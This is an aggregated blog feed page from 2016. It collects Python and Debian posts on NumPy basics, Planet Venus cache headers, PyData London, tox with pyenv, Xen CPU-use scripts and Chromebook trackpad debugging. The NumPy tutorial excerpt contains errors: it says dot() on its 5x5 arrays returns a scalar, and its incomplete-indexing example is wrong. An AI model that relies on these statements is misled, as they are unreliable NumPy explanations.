The 'itemsize' property is how many bytes each item takes up. The data type of this array is int64, there are 64 bits in an int64, 8 bits in a byte, divide 64 by 8 and you get how many bytes it takes up, which in this case is 8.

The 'ndim' property is how many dimensions the array has. This one has 2. A vector for example however, has just 1.

The 'nbytes' property is how many bytes are used up by all the data in the array. You should note that this does not count the overhead of an array and so the actual space that the array takes up will be a little bit larger.

WORKING WITH ARRAYS

Basic Operators

Just being able to make and retrieve elements and properties from an array isn't going to get you very far, you will need to do maths on them sometimes too. You can do this using the basic operators such as +, -, /, etc.

# Basic Operators
a = np.arange(25)
a = a.reshape((5, 5))

b = np.array([10, 62, 1, 14, 2, 56, 79, 2, 1, 45,
4, 92, 5, 55, 63, 43, 35, 6, 53, 24,
56, 3, 56, 44, 78])
b = b.reshape((5,5))

print(a + b)
print(a - b)
print(a * b)
print(a / b)
print(a ** 2)
print(a < b)
print(a > b)

print(a.dot(b))
With the exception of dot() all of these operators work element-wise on the array. For example (a, b, c) + (d, e, f) would be (a+d, b+e, c+f). It will work separately on each element, pairing the corresponding elements up and doing arithmetic on them. It will then return an array of the results. Note that when using logical operators such as < and > an array of booleans will be returned, which has a very useful application which we will go through later.

The dot() function works out the dot product of two arrays. This does not return an array, but a scalar (a value with just magnitude and no direction).

A Bit of the Maths Behind It

The dot() function is something called the dot product. The best way to understand this is to see how it is calculated.


Array Specific Operators

There are also some useful operators provided by NumPy for processing an array.

# dot, sum, min, max, cumsum
a = np.arange(10)

print(a.sum()) # >>>45
print(a.min()) # >>>0
print(a.max()) # >>>9
print(a.cumsum()) # >>>[ 0 1 3 6 10 15 21 28 36 45]
The sum(), min() and max() functions are pretty obvious in what they do. Add up all the elements and find the minimum and maximum elements.

The cumsum() function however is a little less obvious. It adds together every element like sum() but it does this by first adding up the first and the second and storing the result of that calculation in a list and adding that result to the third, which again is then stored in a list. This is done for all elements in the array, returning a running total of the sum of the array as a list.

Advanced Indexing

Fancy Indexing

'Fancy indexing' is a useful way of picking out specific array elements that you want to work with.

# Fancy indexing
a = np.arange(0, 100, 10)
indices = [1, 5, -1]
b = a[indices]
print(a) # >>>[ 0 10 20 30 40 50 60 70 80 90]
print(b) # >>>[10 50 90]
As you can see in the above example we index the array with a sequence of the specific indexes that we want to retrieve. This in turn returns a list of the the elements we indexed.

Boolean masking

Boolean masking is a fantastic feature that allows us to retrieve elements in an array based on a condition that we specify.

# Boolean masking
import matplotlib.pyplot as plt

a = np.linspace(0, 2 * np.pi, 50)
b = np.sin(a)
plt.plot(a,b)
mask = b >= 0
plt.plot(a[mask], b[mask], 'bo')
mask = (b >= 0) & (a <= np.pi / 2)
plt.plot(a[mask], b[mask], 'go')
plt.show()
The above example shows how to do boolean masking. All you have to do is pass the array a conditional involving the array and it will give you an array of the values that return true for that condition.

The example produces the following plot:
We use the conditions to select different points on the plot. The blue points (which in the diagram also include the green points, but the green points cover up the blue ones), show all the points that have a value greater than 0. The green points show all points that have a value greater than 0 and that are less than half pi.


Incomplete Indexing

Incomplete indexing is a convenient way of taking an index or slice from the first dimension of a multidimensional array. For example if you had the array a = [[1, 2, 3, 4, 5], [6, 7, 8, 9, 10]], then a[3] would give you the element with index 3 in the first dimension of the array, which here would be the value 4.

# Incomplete Indexing
a = np.arange(0, 100, 10)
b = a[:5]
c = a[a >= 50]
print(b) # >>>[ 0 10 20 30 40]
print(c) # >>>[50 60 70 80 90]

Where

the where() function is another useful way of retrieving elements of an array conditionally. Simply pass it a condition and it will return a list of elements where that condition is true.

# Where
a = np.arange(0, 100, 10)
b = np.where(a < 50)
c = np.where(a >= 50)[0]
print(b) # >>>(array([0, 1, 2, 3, 4]),)
print(c) # >>>[5 6 7 8 9]


And that's NumPy, not so hard right? Of course this post only covers the basics to get you going, there are many other things that you can do in NumPy that when you are comfortable with these basics, you should take a look at.

Share this post so that other people can read it too and don't forget to subscribe to this blog via email, follow me on Twitter and/or add me on Google+ to make sure you don't miss any posts that you will find useful. Also, feel free to leave a comment whether to ask a question, point out something I've missed or anything else.

This is the second instalment in a series of posts on scientific Python. If you want to learn more about scientific Python, you might like these posts too:

by Planet Python at 2016-05-15 01:05

May 14, 2016

Planet Ubuntu

Kubuntu Wire: Care to help test Plasma 5.6.4? - Planet Ubuntu

Plasma564on1610

 

Come over to #kubuntu-devel on freenode IRC.

by Planet Ubuntu at 2016-05-14 20:30

Planet Python

Anarcat: Long delays posting Debian Planet Venus - Planet Python

For the last few months, it seems that my posts haven't been reaching the Planet Debian aggregator correctly. I timed the last two posts and they both arrived roughly 10 days late in the feed.

SNI issues

At first, I suspected I was a victim of the SNI bug in Planet Venus: since it is still running in Python 2.7 and uses httplib2 (as opposed to, say, Requests), it has trouble with sites running under SNI. In January, there were 9 blogs with that problem on Planet. When this was discussed elsewhere in February, there were now 18, and then 21 reported in March. With everyone enabling (like me) Let's Encrypt on their website, this number is bound to grow.

I was able to reproduce the Debian Planet setup locally to do further tests and ended up sending two (unrelated) patches to the Debian bug tracker against Planet Venus, the software running Debian planet. In my local tests, I found 22 hosts with SNI problems. I also posted some pointers on how the code could be ported over to the more modern Requests and Cachecontrol modules.

Expiry issues

However, some of those feeds were working fine on philp, the host I found was running as the Planet Master. Even more strange, my own website was working fine!

INFO:planet.runner:Feed https://anarc.at/tag/debian-planet/index.rss unchanged

Now that was strange: why was my feed fetched, but noted as unchanged? For that, I found that there was a FAQ question buried down in the PlanetDebian wikipage which explicitly said that Planet obeys Expires headers diligently and will not get new content again if the headers say they did. Skeptical, I looked my own headers and, ta-da! they were way off:

$ curl -v https://anarc.at/tag/debian-planet/index.rss 2>&1 | egrep  '< (Expires|Date)'
< Date: Sat, 14 May 2016 19:59:28 GMT
< Expires: Sat, 28 May 2016 19:59:28 GMT

So I lowered the expires timeout on my RSS feeds to 3 hours:

root@marcos:/etc/apache2# git diff
diff --git a/apache2/conf-available/expires.conf b/apache2/conf-available/expires.conf
index 214f3dd..a983738 100644
--- a/apache2/conf-available/expires.conf
+++ b/apache2/conf-available/expires.conf
@@ -3,8 +3,18 @@
   # Enable expirations.
   ExpiresActive On

-  # Cache all files for 2 weeks after access (A).
-  ExpiresDefault A1209600
+  # Cache all files 12 hours after access
+  ExpiresDefault "access plus 12 hours"
+
+  # RSS feeds should refresh more often
+  <FilesMatch \.(rss)$>
+    ExpiresDefault "modification plus 4 hours"
+  </FilesMatch> 
+
+  # images are *less* likely to change
+  <FilesMatch "\.(gif|jpg|png|js|css)$">
+    ExpiresDefault "access plus 1 month"
+  </FilesMatch>

   <FilesMatch \.(php|cgi)$>
     # Do not allow scripts to be cached unless they explicitly send cache

I also lowered the general cache expiry, except for images, Javascript and CSS.

Planet Venus maintenance

A small last word about all this: I'm surprised to see that Planet Debian is running a 6 year old software that hasn't seen a single official release yet, with local patches on top. It seems that Venus is well designed, I must give them that, but it's a little worrisome to see great software just rotting around like this.

A good "planet" site seems like a resource a lot of FLOSS communities would need: is there another "Planet-like" aggregator out there that is well maintained and more reliable? In Python, preferably.

PlanetPlanet, which Venus was forked from, is out of the question: it is even less maintained than the new fork, which itself seems to have died in 2011.

There is a discussion about the state of Venus on Github which reflects some of the concerns expressed here, as well as on the mailing list. The general consensus seems to be that everyone should switch over to Planet Pluto, which is written in Ruby.

I am not sure which planet Debian sits on - Pluto? Venus? Besides, Pluto is not even a planet anymore...

Mike check!

So this is also a test to see if my posts reach Debian Planet correctly. I suspect no one will ever see this on the top of their feeds, since the posts do get there, but with a 10 days delay and with the original date, so they are "sunk" down. The above expiration fixes won't take effect until the 10 days delay is over... But if you did see this as noise, retroactive apologies in advance for the trouble.

If you are reading this from somewhere else and wish to say hi, don't hesitate, it's always nice to hear from my readers.

by Planet Python at 2016-05-14 19:47

Ian Ozsvald: PyDataLondon 2016 Conference Write-up - Planet Python

We’ve just run our 3rd PyDataLondon Conference (2016) – 3 days, 4 tracks, 330 people.This builds on PyDataLondon 2015. It was ace! If you’d like to be notified about PyDataLondon 2017 then join this announce list (it’ll be super low volume like it has been for the last 2 years).

Big thanks to the organizers, sponsors and speakers, such a great conference it was. Being super tired going home on the train, but it was totally worth it. – Brigitta

We held it at Bloomberg UK again – many thanks to our hosts! I’d also like to thank my colleagues, review committee and all our volunteers for their hard work, the weekend went incredibly smoothly and that’s because our team is so on-top-of-everything – thanks!

Our keynote speakers were:

Our videos are being uploaded to YouTube. Slides will be linked against each author’s entry. There are an awful lot of happy comments on Twitter too. Our speakers covered Python, Julia, R, MCMC, clustering, geodata, financial modeling, visualisation, deployment, pipelines and a whole lot more. I spoke on Statistically Solving Sneezes and Sniffles (a citizen science project using ML to try to diagnose the causes of Rhinitis). Our Beginner Bootcamp (led by Conrad) had over 50 attendees!

…Let me second that. My first PyData also. It was incredible. Well organised – kudos to everyone who helped make it happen; you guys are pros. I found Friday useful as well, are the meetups like that? I’d love to be more involved in this community. –  lewis

We had two signing sessions for five authors with a ton of free books to give away:

  • Kyran Dale – Data Visualisation with Python and Javascript (these were the first copies in the UK!)
  • Amit Nandi – Spark for Python Developers
  • Malcolm Sherrington – Mastering Julia
  • Rui Miguel Forte – Mastering Predictive Analytics with R
  • Ian Ozsvald (me!) – High Performance Python (now in Italian, Polish and Japanese)

 

Some achievements

  • We used slack for all members at the conference – attendees started side-channels to share tutorial files, discuss the meets and recommend lunch venues (!)
  • We added an Unconference track (7 blank slots that anyone could sign-up for on the day), this brought us a nice random mix of new topics and round-table discussions
  • A new bioinformatics slack channel is likely to be formed due to collaborations at the conference
  • We signed up a ton of new volunteers to help us next year (thanks!)
  • An impromptu jobs board appeared on a notice board and was rapidly filled (if useful – also see my jobs list)

Thank you to all the organisers and speakers! It’s been my first PyData and it’s been great! – raffo

We had 15-20% female attendance this year, a slight drop on last year’s numbers (we’ll keep working to do better).

On a personal note it was great to see colleagues who I’ve coached in the past – especially as some were speaking or were a part of our organising committee.

With thanks to our sponsors and via ticket sales we raised more money this year for the NumFOCUS non-profit that backs the scientific Python stack (they give grants and stipends for contributors). We’d love to have more sponsors next year (this is especially useful if you’re hiring!). Thanks to:

Let me know if you do a write-up so I can link it here please:

If you’d like to hear about next year’s event then join this announce list (it’ll be super low volume). You probably also want to join our PyDataLondon meetup.

There are other upcoming PyData conferences including Berlin, Paris and Cologne. Take a look and get involved!

As an aside – if your data science team needs coaching, do drop me a line (and take a look at my coaching testimonials on LinkedIn). If you want a job in data science, take a look at my London Python data science jobs list.


Ian applies Data Science as an AI/Data Scientist for companies in ModelInsight, sign-up for Data Science tutorials in London. Historically Ian ran Mor Consulting. He also founded the image and text annotation API Annotate.io, co-authored SocialTies, programs Python, authored The Screencasting Handbook, lives in London and is a consumer of fine coffees.

by Planet Python at 2016-05-14 19:25

DataCamp: Free Kaggle Machine Learning Tutorial for Python - Planet Python

AlwaysAlways wanted to compete in a Kaggle competition, but not sure where to get started? Together with the team at Kaggle, we have developed a free interactive Machine Learning tutorial in Python that can be used in your Kaggle competitions! Step by step, through fun coding challenges, the tutorial will teach you how to predict survival rate for Kaggle's Titanic competition using Python and Machine Learning. Start the Machine Learning with Python tutorial now!

Learning Machine Learning with Python Interactively

This free Python tutorial is provided by DataCamp, an online interactive education platform that offers courses in data science. Each course is built around a certain data science topic and combines video instruction with in-browser coding challenges so that you can learn by doing. You can start every course for free, whenever you want, wherever you want.

The Machine Learning Tutorial

In this Machine Learning tutorial, you will gradually learn how basic machine learning techniques can help you to make better predictions. Go through all the steps, upload your results to Kaggle, and see your ranking go up. No need to install anything. Everything will take place in the comfort of your own browser. Learn:

  • How to load and manipulate your data set using Python.

  • Make basic predictions using variables such as age and gender.

  • How to create your first decision tree.

  • How to make use of feature engineering to improve results.

  • What exactly 'overfitting' means, and how to avoid it.

  • How to make use of the ML technique Random Forests.

So don't wait and get started. Want to see other topics covered as well? Just let us know on Twitter.

Create your own course

Want to create your own course? With DataCamp Teach, you can easily create and host your own interactive tutorial for free. Use the same system DataCamp course creators use to develop their courses, and share your Python knowledge with the rest of the world. 

by Planet Python at 2016-05-14 19:24

Podcast.__init__: Episode 57 - Buildbot with Pierre Tardy - Planet Python

Visit our site to listen to past episodes, support the show, join our community, and sign up for our mailing list.

Summary

As technology professionals, we need to make sure that the software we write is reliably bug free and the best way to do that is with a continuous integration and continuous deployment pipeline. This week we spoke with Pierre Tardy about Buildbot, which is a Python framework for building and maintaining CI/CD workflows to keep our software projects on track.

Brief Introduction

  • Hello and welcome to Podcast.__init__, the podcast about Python and the people who make it great.
  • I would like to thank everyone who has donated to the show. Your contributions help us make the show sustainable. For details on how to support the show, subscribe, join our newsletter, check out the show notes, and get in touch you can visit our site at pythonpodcast.com
  • Linode is sponsoring us this week. Check them out at linode.com/podcastinit and get a $20 credit to try out their fast and reliable Linux virtual servers for your next project
  • We are also sponsored by Rollbar this week. Rollbar is a service for tracking and aggregating your application errors so that you can find and fix the bugs in your application before your users notice they exist. Use the link rollbar.com/podcastinit to get 90 days and 300,000 errors for free on their bootstrap plan.
  • Join our community! Visit discourse.pythonpodcast.com for your opportunity to find out about upcoming guests, suggest questions, and propose show ideas.
  • Your hosts as usual are Tobias Macey and Chris Patti
  • Today we are interviewing Pierre Tardy about the Buildbot continuous integration system.
Linode Sponsor Banner

Use the promo code podcastinit20 to get a $20 credit when you sign up!

Rollbar Logo

I’m excited to tell you about a new sponsor of the show, Rollbar.

One of the frustrating things about being a developer, is dealing with errors… (sigh)

  • Relying on users to report errors
  • Digging thru log files trying to debug issues
  • A million alerts flooding your inbox ruining your day…

With Rollbar’s full-stack error monitoring, you get the context, insights and control you need to find and fix bugs faster. It’s easy to get started tracking the errors and exceptions in your stack.You can start tracking production errors and deployments in 8 minutes - or less, and Rollbar works with all major languages and frameworks, including Ruby, Python, Javascript, PHP, Node, iOS, Android and more.You can integrate Rollbar into your existing workflow such as sending error alerts to Slack or Hipchat, or automatically create new issues in Github, JIRA, Pivotal Tracker etc.

We have a special offer for Podcast.__init__ listeners. Go to rollbar.com/podcastinit, signup, and get the Bootstrap Plan free for 90 days. That’s 300,000 errors tracked for free.Loved by developers at awesome companies like Heroku, Twilio, Kayak, Instacart, Zendesk, Twitch and more. Help support Podcast.__init__ and give Rollbar a try a today. Go to rollbar.com/podcastinit

Interview with Pierre Tardy

  • Introductions
  • How did you get introduced to Python? - Chris
  • For anyone who isn’t familiar with it can you explain what Buildbot is? - Tobias
  • What was the original inspiration for creating the project? - Tobias
  • How did you get involved in the project? - Tobias
  • Can you describe the internal architecture of Buildbot and outline how a typical workflow would look? - Tobias
  • There are a number of packages out on PyPI for doing subprocess invocation and control, in addition to the functions in the standard library. Which does buildbot use and why? - Chris
  • What makes Buildbot stand out from other CI/CD options that are available today? - Tobias
  • Scaling a large CI/CD system can become a challenge. What are some of the limiting factors in the Buildbot architecture and in what ways have you seen people work to overcome them? - Tobias
  • Are there any design or architecture choices that you would change in the project if you were to start it over? - Tobias
  • If you were starting from scratch on implementing buildbot today, would you still use Python? Why? - Chris
  • What are some of the most difficult challenges that have been faced in the creation and evolution of the project? - Tobias
  • What are some of the most notable uses of Buildbot and how do they uniquely leverage the capabilities of the framework? - Tobias
  • What are some of the biggest challenges that people face when beginning to implement Buildbot in their architecture? - Tobias
  • Does buildbot support the use of docker or public clouds as a part of the build process? - Chris
  • I know that the execution engine for Buildbot is written in Twisted. What benefits does that provide and how has that influenced any efforts for providing Python 3 support? - Tobias
  • Does buildbot support build parallelization at all? For instance splitting one very long test run up into 3 instances each running a section of tests to cut build time? - Chris
  • What are some of the most requested features for the project and are there any that would be unreasonably difficult to implement due to the current design of the project? - Tobias
  • Does buildbot offer a plugin system like Jenkins does, or is there some other approach it uses for custom extensions to the base buildbot functionality? - Chris
  • Managing a reliable build pipeline can be operationally challenging. What are some of the thorniest problems for Buildbot in this regard and what are some of the mechanisms that are built in to simplify the operational characteristics? - Tobias
  • What were some of the challenges around supporting slaves running on platforms with very different environmental characteristics like Microsoft Windows? - Chris
  • What is on the roadmap for Buildbot? - Tobias

Keep In Touch

Picks

Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA

Visit our site to listen to past episodes, support the show, join our community, and sign up for our mailing list.Summary As technology professionals, we need to make sure that the software we write is reliably bug free and the best way to do that is with a continuous integration and continuous deployment pipeline. This week we spoke with Pierre Tardy about Buildbot, which is a Python framework for building and maintaining CI/CD workflows to keep our software projects on track.Brief IntroductionHello and welcome to Podcast.__init__, the podcast about Python and the people who make it great.I would like to thank everyone who has donated to the show. Your contributions help us make the show sustainable. For details on how to support the show, subscribe, join our newsletter, check out the show notes, and get in touch you can visit our site at pythonpodcast.comLinode is sponsoring us this week. Check them out at linode.com/podcastinit and get a $20 credit to try out their fast and reliable Linux virtual servers for your next projectWe are also sponsored by Rollbar this week. Rollbar is a service for tracking and aggregating your application errors so that you can find and fix the bugs in your application before your users notice they exist. Use the link rollbar.com/podcastinit to get 90 days and 300,000 errors for free on their bootstrap plan.Join our community! Visit discourse.pythonpodcast.com for your opportunity to find out about upcoming guests, suggest questions, and propose show ideas.Your hosts as usual are Tobias Macey and Chris PattiToday we are interviewing Pierre Tardy about the Buildbot continuous integration system. Use the promo code podcastinit20 to get a $20 credit when you sign up! I’m excited to tell you about a new sponsor of the show, Rollbar. One of the frustrating things about being a developer, is dealing with errors… (sigh)Relying on users to report errorsDigging thru log files trying to debug issuesA million alerts flooding your inbox ruining your day...With Rollbar’s full-stack error monitoring, you get the context, insights and control you need to find and fix bugs faster. It's easy to get started tracking the errors and exceptions in your stack.You can start tracking production errors and deployments in 8 minutes - or less, and Rollbar works with all major languages and frameworks, including Ruby, Python, Javascript, PHP, Node, iOS, Android and more.You can integrate Rollbar into your existing workflow such as sending error alerts to Slack or Hipchat, or automatically create new issues in Github, JIRA, Pivotal Tracker etc. We have a special offer for Podcast.__init__ listeners. Go to rollbar.com/podcastinit, signup, and get the Bootstrap Plan free for 90 days. That's 300,000 errors tracked for free.Loved by developers at awesome companies like Heroku, Twilio, Kayak, Instacart, Zendesk, Twitch and more. Help support Podcast.__init__ and give Rollbar a try a today. Go to rollbar.com/podcastinitInterview with Pierre TardyIntroductionsHow did you get introduced to Python? - ChrisFor anyone who isn't familiar with it can you explain what Buildbot is? - TobiasWhat was the original inspiration for creating the project? - TobiasHow did you get involved in the project? - TobiasCan you describe the internal architecture of Buildbot and outline how a typical workflow would look? - TobiasThere are a number of packages out on PyPI for doing subprocess invocation and control, in addition to the functions in the standard library. Which does buildbot use and why? - ChrisWhat makes Buildbot stand out from other CI/CD options that are available today? - TobiasScaling a large CI/CD system can become a challenge. What are some of the limiting factors in the Buildbot architecture and in what ways have you seen people work to overcome them? - TobiasAre there any design or architecture choices that you would change in the project if you were to start it over? - TobiasIf you were starting from scratch on implementing buildb

by Planet Python at 2016-05-14 18:51

More Words, Deeper Hole

Canadian comic artist, writer Darwyn Cooke dies - More Words, Deeper Hole


Darwyn Cooke, the artist and writer who made a name for himself in mainstream comics with a retro style and a belief that more comics should be aimed at the children’s audience the industry had left behind, died on May 14. The day before, his family released a statement that he had entered palliative care after undergoing treatment for an “aggressive” cancer.

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-14 16:06

Planet Debian

Thadeu Lima de Souza Cascardo: Chromebook Trackpad - Planet Debian

Three years ago, I wanted to get a new laptop. I wanted something that could run free software, preferably without blobs, with some good amount of RAM, good battery and very light, something I could carry along with a work laptop. And I didn't want to spend too much. I don't want to make this too long, so in the end, I asked in the store anything that didn't come with Windows installed, and before I was dragged into the Macbook section, I shouted "and no Apple!". That's how I got into the Chromebook section with two options before me.

There was the Chromebook Pixel, too expensive for me, and the Samsung Chromebook, using ARM. Getting a laptop with an ARM processor was interesting for me, because I like playing with different stuff. I looked up if it would be possible to run something other than ChromeOS on it, got the sense that is, it would, and make a call. It does not have too much RAM, but it was cheap. I got an external HD to compensate for the lack of storage (only 16GB eMMC), and that was it.

Wifi does require non-free firmware to be loaded, but booting was a nice surprise. It is not perfect, but I will see if I can get to that another day.

I managed to get Fedora installed, downloading chunks of an image that I could write into the storage. After a while, I backed up home, and installed Debian using debootstrap.

Recently, after an upgrade from wheezy to jessie, things stopped working. systemd would not mount the most basic partitions and would simply stop very early in the boot process. That's a story on my backlog as well, that I plan to tell soon, since I believe this connects with supporting Debian on mobile devices.

After fixing some things, I decided to try libinput instead of synaptics for the Trackpad. The Chromebook uses a Cypress APA Trackpad. The driver was upstreamed in Linux 3.9. The Chrome OS ships with Linux 3.4, but had the driver in its branch.

After changing to libinput, I realized clicking did not work. Neither did tapping. I moved back to synaptics, and was reminded things didn't work too well with that either. I always had to enable tapping.

I have some experience with input devices. I wrote drivers, small applications reacting to some events, and some uinput userspace drivers as well. I like playing with that subsystem a lot. But I don't have too much experience with multitouch and libinput is kind of new for me too.

I got my hands on the code and found out there is libinput-debug-events. It will show you how libinput translates evdev events. I clicked on the Trackpad and got nothing but some pointer movements. I tried evtest and there were some multitouch events I didn't understand too well, but it looked like there were important events there that I thought libinput should have recognized.

I tried reading some of libinput code, but didn't get too far before I tried something else. But then, I had to let this exercise for another day. Today, I decided to do it again. Now, with some fresh eyes, I looked at the driver code. It showed support for left, right and middle buttons. But maybe my device doesn't support it, because I don't remember seeing it on evtest when clicking the Trackpad. I also understood better the other multitouch events, they were just saying how many fingers there were and what was the position of which one of them. In the case of a single finger, you still get an identifier. For better understanding of all this, reading Documentation/input/event-codes.txt and Documentation/input/multi-touch-protocol.txt is recommended.

So, in trying to answer if libinput needs to handle my devices events properly, or handle my device specially, or if the driver requires changes, or what else I can do to have a better experience with this Trackpad, things were tending to the driver and device. Then, after running evtest, I noticed a BTN_LEFT event. OK, so the device and driver support it, what is libinput doing with that? Running evtest and libinput-debug-events at the same time, I found out the problem. libinput was handling BTN_LEFT correctly, but the driver was not reporting it all the time.

By going through the driver, it looks like this is either a firmware or a hardware problem. When you get the click response, sound and everything, the drivers will not always report it. It could be pressure, eletrical contact, I can't tell for sure. But the driver does not check for anything but what the firmware has reported, so it's not the driver.

A very interesting I found out is that you can read and write the firmware. I dumped it to a file, but still could not analyze what it is. There are some commands to put the driver into some bootloader state, so maybe it's possible to play with the firmware without bricking the device, though I am not sure yet. Even then, the problem might not be fixable by just changing the firmware.

So, I left with the possibility of using tapping, which was not working with libinput. Grepping at the code, I found out by libinput documentation that tapping needs to be enabled. The libinput xorg driver supports that. Just set the Tapping option to true and that's it.

So, now I am a happy libinput user, with some of the same issues I had before with synaptics, but something you get used to. And I have a new firmware in front of me that maybe we could tackle by some reverse engineering.

by Thadeu Lima de Souza Cascardo at 2016-05-14 15:26

Planet Python

Holger Peters: Using pyenv and tox - Planet Python

I usually use pyenv to manage my Python interpreters and obtain them in whatever version I need. Another tool I occasionally use is tox by Holger Krekel, which nicely generates build matrices for library and python interpreter versions, that come handy when you develop a library targeting multiple Python versions (and dependencies).

However, until recently I didn't know how to use the two of them together. With pyenv, I usually ended up with one python interpreter in my path, so tox had only one interpreter to choose from, and I was missing out on tox' selling point: testing your code over various versions of Python.

Install Multiple Python Version With Pyenv

Setting up your pyenv usually looks like this:

% pyenv install 3.5.1
% pyenv install 2.7.10
% cd my_project_dir
% pyenv local 3.5.1

Now it is possible to use multiple Python versions here:

% pyenv local 3.5.1 2.7.10
% python3.5 --version
Python 3.5.1
% python2.7 --version
Python 2.7.10

Then, tox can find interpreters, typically you will have a tox.ini in your project that starts with something like this:

[tox]
envlist = py27,py34,py35
skip_missing_interpreters = True

[testenv]
commands=py.test
deps = -rrequirements.txt

Invoking tox should now run tox with the two available Python versions, 2.7 and 3.5, skipping 3.4 unless it is installed.

by Planet Python at 2016-05-14 15:25

Making Light

Open thread 212 - Making Light

There's a stand at the street market in Waterlooplein that sells old postcards. Sometimes what a person finds there is...

by Abi Sutherland at 2016-05-14 11:51

Planet Debian

Russell Coker: Xen CPU Use per Domain again - Planet Debian

8 years ago I wrote a script to summarise Xen CPU use per domain [1]. Since then changes to Xen required changes to the script. I have new versions for Debian/Wheezy (Xen 4.1) and Debian/Jessie (Xen 4.4).

Here’s a new script for Debian/Wheezy:

#!/usr/bin/perl
use strict;

open(LIST, "xm list --long|") or die "Can't get list";

my $name = "Dom0";
my $uptime = 0.0;
my $cpu_time = 0.0;
my $total_percent = 0.0;
my $cur_time = time();

open(UPTIME, "</proc/uptime") or die "Can't open /proc/uptime";
my @arr = split(/ /, <UPTIME>);
$uptime = $arr[0];
close(UPTIME);

my %all_cpu;

while(<LIST>)
{
  chomp;
  if($_ =~ /^\)/)
  {
    my $cpu = $cpu_time / $uptime * 100.0;
    if($name =~ /Domain-0/)
    {
      printf("%s uses %.2f%% of one CPU\n", $name, $cpu);
    }
    else
    {
      $all_cpu{$name} = $cpu;
    }
    $total_percent += $cpu;
    next;
  }
  $_ =~ s/\).*$//;
  if($_ =~ /start_time /)
  {
    $_ =~ s/^.*start_time //;
    $uptime = $cur_time – $_;
    next;
  }
  if($_ =~ /cpu_time /)
  {
    $_ =~ s/^.*cpu_time //;
    $cpu_time = $_;
    next;
  }
  if($_ =~ /\(name /)
  {
    $_ =~ s/^.*name //;
    $name = $_;
    next;
  }
}
close(LIST);

sub hashValueDescendingNum {
  $all_cpu{$b} <=> $all_cpu{$a};
}

my $key;

foreach $key (sort hashValueDescendingNum (keys(%all_cpu)))
{
  printf("%s uses %.2f%% of one CPU\n", $key, $all_cpu{$key});
}

printf("Overall CPU use approximates %.1f%% of one CPU\n", $total_percent);

Here’s the script for Debian/Jessie:

#!/usr/bin/perl

use strict;

open(UPTIME, "xl uptime|") or die "Can't get uptime";
open(LIST, "xl list|") or die "Can't get list";

my %all_uptimes;

while(<UPTIME>)
{
  chomp $_;

  next if($_ =~ /^Name/);
  $_ =~ s/ +/ /g;

  my @split1 = split(/ /, $_);
  my $dom = $split1[0];
  my $uptime = 0;
  my $time_ind = 2;
  if($split1[3] eq "days,")
  {
    $uptime = $split1[2] * 24 * 3600;
    $time_ind = 4;
  }
  my @split2 = split(/:/, $split1[$time_ind]);
  $uptime += $split2[0] * 3600 + $split2[1] * 60 + $split2[2];
  $all_uptimes{$dom} = $uptime;
}
close(UPTIME);

my $total_percent = 0;

while(<LIST>)
{
  chomp $_;

  my $dom = $_;
  $dom =~ s/ .*$//;

  if ( $_ =~ /(\d+)\.[0-9]$/ )
  {
    my $percent = $1 / $all_uptimes{$dom} * 100.0;
    $total_percent += $percent;
    printf("%s uses %.2f%% of one CPU\n", $dom, $percent);
  }
  else
  {
    next;
  }
}

printf("Overall CPU use approximates  %.1f%% of one CPU\n", $total_percent);

by etbe at 2016-05-14 09:30

Michal Čihař: Fifteen years with phpMyAdmin and free software - Planet Debian

Today it's fifteen years from my first contribution to free software. I've changed several jobs since that time, all of them involved quite a lot of free software and now I'm fully working on free software.

The first contribution happened to be on phpMyAdmin and did consist of Czech translation:

Subject: Updated Czech translation of phpMyAdmin
From: Michal Cihar <cihar@email.cz>
To: swix@users.sourceforge.net
Date: Mon, 14 May 2001 11:23:36 +0200
X-Mailer: KMail [version 1.2]

Hi

I've updated (translated few added messages) Czech translation of phpMyAdmin. 
I send it to you in two encodings, because I thing that in distribution 
should be included version in ISO-8859-2 which is more standard than Windows 
1250.

Regards
    Michal Cihar

Many other contributions came afterwards, several projects died on the way, but it has been a great ride so far. To see some of these you can look at my software page which contains both current and past projects and also includes later opensourced tools I've created earlier (mostly for Windows).

These days you can find me being active on phpMyAdmin, Gammu, python-gammu and Wammu, Debian and Weblate.

Filed under: Debian English phpMyAdmin SUSE | 2 comments

by Michal Čihař at 2016-05-14 09:23

Kevin and Kell

Chameleon selfies - Kevin and Kell

Comic for Saturday May 14th, 2016 - "Chameleon selfies" [ view ]

On this day in 1998, Kevin was starting to wonder what to tell the trash collectors since there isn't anything his mixed family leaves to waste... [ view ]

Today's Daily Sponsor - No sponsor for this strip. [ support ]

by Kevin and Kell at 2016-05-14 05:00

The Endeavour

Top tweets - The Endeavour

I had a couple tweets this week that were fairly popular. The first was a pun on the musical Hamilton and the Hamiltonian from physics. The former is about Alexander Hamilton (1755–1804) and the latter is named after William Rowan Hamilton (1805–1865).

The second was a sort of snowclone, a variation on the line from the Bhagavad Gita that J. Robert Oppenheimer famously quoted in reference to the atomic bomb:

by John at 2016-05-14 03:02

Planet Debian

Gunnar Wolf: Debugging backdoors and the usual software distribution for embedded-oriented systems - Planet Debian

In the ARM world, to which I am still mostly a newcomer (although I've been already playing with ARM machines for over two years, I am a complete newbie compared to my Debian friends who live and breathe that architecture), the most common way to distribute operating systems is to distribute complete, already-installed images. I have ranted in the past on how those images ought to be distributed.

Some time later, I also discussed on my blog on how most of this hardware requires unauditable binary blobs and other non-upstreamed modifications to Linux.

In the meanwhile, I started teaching on the Embedded Linux diploma course in Facultad de Ingeniería, UNAM. It has been quite successful — And fun.

Anyway, one of the points we make emphasis on to our students is that the very concept of embedded makes the mere idea of downloading a pre-built, 4GB image, loaded with a (supposedly lightweight, but far fatter than my usual) desktop environment and whatnot an irony.

As part of the "Linux Userspace" and "Boot process" modules, we make a lot of emphasis on how to build a minimal image. And even leaving installed size aside, it all boils down to trust. We teach mainly four different ways of setting up a system:

  • Using our trusty Debian Installer in the (unfortunately few) devices where it is supported
  • Installing via Debootstrap, as I did in my CuBox-i tutorial (note that the tutorial is nowadays obsolete. The CuBox-i can boot with Debian Installer!) and just keeping the boot partition (both for u-boot and for the kernel) of the vendor-provided install
  • Building a barebones system using the great Buildroot set of scripts and hacks
  • Downloading a full, but minimal, installed image, such as OpenWRT (I have yet to see what's there about its fork, LEDE)

Now... In the past few days, a huge vulnerability / oversight was discovered and made public, supporting my distrust of distribution forms that do not come from, well... The people we already know and trust to do this kind of work!

